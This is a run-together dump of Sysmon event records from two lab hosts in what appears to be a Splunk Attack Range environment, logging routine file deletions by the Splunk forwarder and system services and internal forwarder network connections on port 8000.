Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9879CCAC0A750A6A4D75C36B1E414237,SHA256=C1724CD4B7D80514F8F1AF8DF75CDDA238EF20B72BF199181F1312AD385359D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:22.796{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B79D711D82A61C77023678B3A5819FA1,SHA256=8B0E614AB5652E1B464244B0D2C4B13E8BCCBAD9E4178CA46A3A7C07FA2662AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:21.603{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51453-false10.0.1.12-8000- 23542300x8000000000000000218322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:23.654{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A742F68C59CE3FF003311E305C5C303F,SHA256=0A09F4545EF75CDEB3D6B86417C81B8155686BB0731B279EAFB61FF62E7A04FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:23.796{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31C80BE23D44B1207D216055A0D3C285,SHA256=C39AF4A7A47A6FE8D63B3CC258214F186AF9A7F8D181ED9933AFCC12230F1EE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:24.882{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9818E6336E989650EF57A7DDED20D8DC,SHA256=B92138A6F4B723AF7F4697E3ECBDC2A38AB889A293B9080377406C35340C0861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:24.670{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F2E3CEC8A9FC4897974F42A040294E5,SHA256=C14BAA43135EA9CDC9BBA16F2277EF2BD71DA35EF7A440189F1DD6E921CD9C46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:25.912{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FEBDBA52EDF7FF56F3A53E69751FDCB,SHA256=5EC0C834CA0720872EFA143BC792456B21AB5F06EC4C74E369476AEFA9B100E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:25.685{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81063513CF73AE2C37E1CE0B4DCC23B1,SHA256=C1B51B50932B4D42FE64D6262C55CE3CA09AEEEAC3B6A110EEE722C6168F919E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:26.943{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B70BAC9D720999095E14F1F3A2E457B,SHA256=D8C3BD4F1CE924DC42C8CB0A4D3AA95CACD5A7DA07B23CF164289418863A0DE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:26.685{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48948D0CE7D5056D289355783EFE694C,SHA256=AA005608F583B41FF7A969A65CBD47C9ADA6B58EA7208B690E105B797D9A0184,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:23.685{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53849-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000218327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:27.701{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D112E559C2DBC2CBBBCABB01113EB2,SHA256=6ED37539AED948BFD3AD6D4E6B8467C769D086B48A4F19EC4820EDF3D190B80A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:27.945{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33CE6003A0B79B23CF8EF38108B6DEA2,SHA256=2ABF9853B4CF2F4D7FE46E16EAD0FDDA6510EC5A37EBB1CFE79D69EFDC63ED9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:27.381{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Logs\WindowsUpdate\WindowsUpdate.20210708.023017.317.1.etlMD5=763D5E6B729EC1D24692AFAA20FDAFD1,SHA256=4A2D38E71E3630F9CDE360785918048EAD4EAB9BE4D15D9E0318949EC06A5B68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:28.946{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=941753A064A55B44D8BFCE2207C505C3,SHA256=9799362ACC2EA02F574C1F5E88519331387203C313B7294E0831F7B2F5AB91AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:28.716{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB257138D24A6AA19D15B9CE9A7995A1,SHA256=A2977D83DAC816F6C001303AEA1295BB0776E7F5552A08BBAD62389CE07CB2BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:28.400{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F6439C9BCFAB801134D4B39E298C3F19,SHA256=32E7013F5315F4BD768F51BF57FCD423511686D041BC8E7CF06230CA5EF3C5AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:28.400{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8632A8696E2BAC24190207550228E81A,SHA256=1694ADDCB60696F4EA5D7A036D04C5B4BEB6656A1D47B9A8ED4F232B1CEA0288,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:28.230{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E69AD869FEB75333F9D516416C282B9,SHA256=13D897074DF28172D977DBFFB34B78AC0F1E11A86AB486710943666F071A93C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:28.230{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0BD4502E27B66E1885A08A289BE4EFD,SHA256=5F0B80E6B4660696E8DE6DA96CD0D4744C690D70F4ACBC73566EBD47AE83FD0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:29.952{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B6A88028BA17B502A094C6033E1D81,SHA256=8D0EA701740EB8E350039D7F46F981C0E5C8EAED7F91C9F6C2CEA14C4CDD4A83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:29.732{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAA1A621E92B80A42BE24C18313B8B56,SHA256=1491B481E4C0B4177F910D7ADFEC0D306046397FE92D16F1B1C7138D5EB9037F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:26.649{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51454-false10.0.1.12-8000- 23542300x8000000000000000294001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:30.960{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0644A22CF2E17CFA7069541F7721B156,SHA256=1764F0C5E9B1E8B1AD92CCD108C7F425F91BB87BDFF7AEB2226631661E6E0D78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:30.747{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D39C98EB44452FF1DB29EB1B8D29DEB1,SHA256=D87C4E9548B64062792681BBE5B723BF0FE7AF19E3F6B4355562F274EDB8AD92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:30.720{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-143MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:30.372{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=1549BD35954D05F7BDB1EB6383C2AD44,SHA256=A10CE0D15E5EEE6C88979F0B4C2A71550ECB5AF44DDE18C99FC90B62A31D7F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:31.763{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF762793C2E7708DE4CE937BFEEE27A,SHA256=54DB1221ADFD9A9C4A0B116A6DDA77836FE33F416ACB605A11714FDB6CF382BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:31.959{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=F6439C9BCFAB801134D4B39E298C3F19,SHA256=32E7013F5315F4BD768F51BF57FCD423511686D041BC8E7CF06230CA5EF3C5AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:31.730{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-144MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:29.678{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53850-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000218334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:32.779{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1391A69C92464B54B58D5C9CFAEB1D2B,SHA256=8319814C6679B9046084C1B89D792365ED4F9C701F5E6F2DA8E5711440786132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:31.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21DF7ACB360FB94C26680BA50D7CF335,SHA256=FA4DD2E9E1DADA49259A011CADC68C544713F382A6DD75BCA5C48235325DA944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:33.794{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37B06202EF9E3F0374AAA267AE748C77,SHA256=43E41BF3CE11A1622FA4BD084F6E13B2E0BD6145B2A079F88BFF1C27A00AC5C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:33.428{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E065D70186D0157E236BC92468FD73FE,SHA256=0EBB2CFB1EE7E3C97432FF82C9F65C23CE59FEA56778834D75F693A980E77020,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:32.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60B80EC4E8D7D039EAC782E754C1C654,SHA256=8F557BFA365F5C35F59F113F06D5240517E4917C8D85E9C6629506DCA8D432BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:34.810{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65CFDC0F0E797D9790BE47BC40720843,SHA256=C9BEC3BA441A6353B7F2EEAAEDA73E81A5F8A886932412C1011347E42CC82F70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:34.013{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39B112BA91D6879F732BE788E8AF37BA,SHA256=EC3F1B6EB085999E3AC98C1133DD48CCB35347F1795676BB43024AE1FFA707AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:31.696{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51455-false10.0.1.12-8000- 23542300x8000000000000000218338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:35.825{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98DA9A70A74B54A389B1531971597AFE,SHA256=90BBE5211A391E2127960ADC16FBD835DC97ACF8BCE3F7FED738CCD116C4685B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:35.043{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649E95CEC570C9ADCAB0712FD8691A0B,SHA256=BAECB8991FE4538CB2B592F8218942E1C07185D79780366342CEAE6F9C54F0B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:36.841{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D780532E3B3B43E553C4E99ECE7CE87,SHA256=46523A7BEF20BAA1A9CE3BF2C2E5F424C577701FC648F825810E30E5B380587A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:34.685{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53853-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:36.127{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B8AE6F0D2E77CACCE3616002A1E39114,SHA256=EFDC187A4A96AC317AEE8DD4AB1A74B78462CDE18E117083D81F14DFAF850C14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:36.058{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA0CB400A05912A79F585B78A17CD673,SHA256=236571265F6310B86D0FB33582DEB8680BC1AD32A5BAC81F6D362A5FCB5D62CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:37.857{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE210FC1C841954F1D22BD5A8436DED5,SHA256=7554DFBE4A52B450133DE4093218DC51602A3AC0F775B1C55A64409342B6296A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:37.064{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14290CAB15EB56A43D8CB278495CC8BE,SHA256=F7D00BDFE0A09E37585E2C0260CCC75D80C5E3A066AEFE9EDF95438CB2EAE3A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:38.872{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EBE644980B69E8DF4D8E202F56E8F72,SHA256=CDDCAFD3096D32AA1E2B5D2337B0E954F6CFD770B991C37723DB39F68A55E7B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:38.082{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E61F97464BC8760C2FFB6E7D63F56253,SHA256=536B380655485E9B77F225CEE4CDFD189899EB9D44D156E673940A2746C0F948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:39.103{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCB34F3B197F42038FDFFB7509608FF8,SHA256=8061133C21719016CEC8FF2D3872750E850C2ADBE514E7C2314442FEA53B037A,IMPHASH=00000000000000000000000000000000falsetrue 